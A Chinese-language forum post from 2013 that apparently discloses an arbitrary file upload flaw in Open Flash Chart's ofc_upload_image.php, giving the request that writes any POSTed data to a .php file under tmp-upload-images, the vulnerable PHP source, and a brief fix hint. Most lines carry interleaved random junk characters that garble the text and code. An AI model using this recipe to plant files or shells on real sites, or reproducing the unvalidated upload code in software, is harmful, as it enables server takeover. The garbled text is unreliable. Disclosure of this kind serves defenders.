POST 数据漏洞文件执行任意后缀文件保存2 F# F6 h& A1 Q* e k
漏洞文件/chart/php-ofc-library/ofc_upload_image.php: H) \0 c1 h" R9 b: h
0 A% ]7 i, a$ C; D7 a, D& ~) f
利用:4 r) U7 \' r4 e7 D& z1 B
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
Y& h/ Z/ U$ D0 F, @1 v" [ Z+ M" @( Y) \& i
Post任意数据
( \& ~' C: q5 B' O7 B2 ]保存位置http://localhost/chart/tmp-upload-images/hfy.php# E5 n% f) a* Q B
# D2 R3 n& W8 t6 E6 f+ `# W* I' H; _/ D2 f
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
1 m0 Z) X- V% r
# e" G( O, L8 Y' k K<?php. I/ A5 @" s2 U% X
5 x3 k! X# I0 [ r; X: ]- Z3 B' v; p//* c1 C$ e3 {4 e% l) p2 Z! ^
// In Open Flash Chart -> save_image debug mode, you9 }% ?: `8 `) c2 s, Q0 s$ ]
// will see the 'echo' text in a new window.
9 H% E h, q+ ^2 h/ t& @7 o//
- C* o0 n& G! U: \: \
# j' p( L% }! n/ G/*) [) T* w% L6 K7 i P1 K! u" w
/ C) u- \. u( d3 X! s3 m
print_r( $_GET );
$ ^6 G/ t& ]7 U" [5 i6 E( @print_r( $_POST );
( F* o* E5 c& n7 Z5 Gprint_r( $_FILES );
: c0 o) K: y! T+ O% W( N! y4 y- I' y% c7 ^0 U
print_r( $GLOBALS );
$ y3 X) L2 {; oprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );* \. ^4 h6 ~% ~* Z
6 Y8 J' ^- E$ i$ F$ i" C*/
# M7 z, f2 ], k3 O# [: N! a0 I; t) J* Z// default path for the image to be stored //% w6 u+ H) k- E& S5 H) d9 b( A
$default_path = '../tmp-upload-images/';
4 e3 W4 o, s! F3 o; \9 K5 G6 i5 \' p+ D; d% e9 K
if (!file_exists($default_path)) mkdir($default_path, 0777, true);7 i5 K5 Q/ G0 _4 t
/ i8 l: z6 H( ^" w& k% t// full path to the saved image including filename //
5 b. o1 w: z" k$destination = $default_path . basename( $_GET[ 'name' ] );
; V# S2 N, O# v; R4 b F
* k# u" |! G4 J1 H. lecho 'Saving your image to: '. $destination;0 R) @+ a c( `0 m% c7 c' R1 F$ _' h
// print_r( $_POST );
6 `- ]7 j: T; L$ c8 P// print_r( $_SERVER );
% k( R$ n0 l* P% e: n+ I// echo $HTTP_RAW_POST_DATA;+ c, z9 f$ ~8 a& V- |- k$ ~
+ d/ v* D7 X, ^//
4 |7 @( Z/ p6 B3 D- P5 Y// POST data is usually string data, but we are passing a RAW .png
) {4 n" }$ h$ d1 Q: N, y' u/ l. t// so PHP is a bit confused and $_POST is empty. But it has saved
6 s: C* ~8 [0 ]& X// the raw bits into $HTTP_RAW_POST_DATA
: \* o2 r1 n. g7 ~6 V9 ^9 R( `//
|- C! R* d+ r- k, @+ Q0 l3 y& X! U6 Z% f. U, n
$jfh = fopen($destination, 'w') or die("can't open file");4 I4 m6 b" T5 ^( {% B
fwrite($jfh, $HTTP_RAW_POST_DATA);/ q- G2 l+ i. ?6 D
fclose($jfh);
4 s* o1 H {2 {! c) N# p! n! B
/ ?% S0 {0 ?9 t- }3 @8 v# _//
2 j6 k$ Q& `4 H' w4 w// LOOK:
8 y8 y( N: A- B8 M' }6 d2 g//; t9 ~' s6 o1 k- `! O
exit();
" K; _9 Z: f: n8 ]- J//, M7 q9 ^% @1 Y6 B9 Q
// PHP5:
% a! r$ n: g, e6 t' a. q//
; z( }, _# Q% e) U( E+ N
5 G/ M6 Y$ L o" Z, n8 D/ K9 ?" f* a$ }1 ]' f
// default path for the image to be stored //
/ L0 S' X, }% H* x) R! i$default_path = 'tmp-upload-images/';
) d1 y" k. b. F# l4 ?* p3 n8 N$ @) t2 h2 W+ w) d# d8 Q% ?
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
G# C8 }( p+ f7 S' _- S
- C* C3 a, P! J7 X// full path to the saved image including filename //+ W. `: y% t P
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
$ o: l! F: q2 F* c8 v k8 L( ~
# A& g' q/ q% Q2 \// move the image into the specified directory //: C. V6 i5 _/ f" P$ c Y
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
9 E. q7 n5 [" A2 E; M echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
; f( V9 B; U' C6 F3 L* H} else {; [( r# n! e4 b9 l
echo "FILE UPLOAD FAILED";
3 k! |* h! E% ^ Y4 W% k8 x}
6 e7 X" O0 ~3 |1 e3 ~) {( H! ?- H3 q& b) H. c
: ~5 _" U2 x# f+ |
?>
2 J x* r1 p- S
3 I5 g2 \* ]1 `* F. n7 v+ b7 B& _ J% p1 y3 y7 L6 ?' Y
. m3 x% Z y9 l: k; {6 F( F# Z3 ?7 T. ~0 h3 @7 }& M% i
1 o& X7 R7 P# k1 X; o) n
' a% d2 U, p# K- j2 g
修复方案:
' t3 F$ ]# @9 n- ?" T! {这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 ) Q+ _+ c0 A9 H% p: S
& C3 v, f- M) R! ?# O
+ k( Y8 z$ g0 O2 \$ h+ Z* P8 f
9 o& G8 T# _5 A8 I T
, y ~# y! `* @* Z' F |
发表于 2013-2-23 12:38:58
收藏
支持
反对